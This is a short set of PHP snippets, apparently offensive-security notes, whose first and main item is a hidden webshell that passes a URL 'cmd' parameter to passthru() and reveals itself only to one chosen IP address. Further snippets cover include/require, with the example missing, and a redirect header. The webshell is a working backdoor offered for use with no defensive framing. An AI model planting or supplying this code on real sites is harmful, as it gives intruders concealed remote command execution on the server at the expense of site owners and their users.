This creates a hidden webshell on a page which will only display if connecting from a previously defined IP.

<?php
    if($_SERVER['REMOTE_ADDR'] == '127.0.0.1') {
        echo 'you have a nice IP, have a cool secret!<br><br>';
        echo passthru($_GET['cmd']);
    } else {
        echo '';
    }
?>

Inclusion

Adding the include or require allows the page to execute PHP code from other files. This can be used for a header or footer file.

<?php

Adding a header to the page

<?php
    header('Location: https://m4lwhere.org');
?>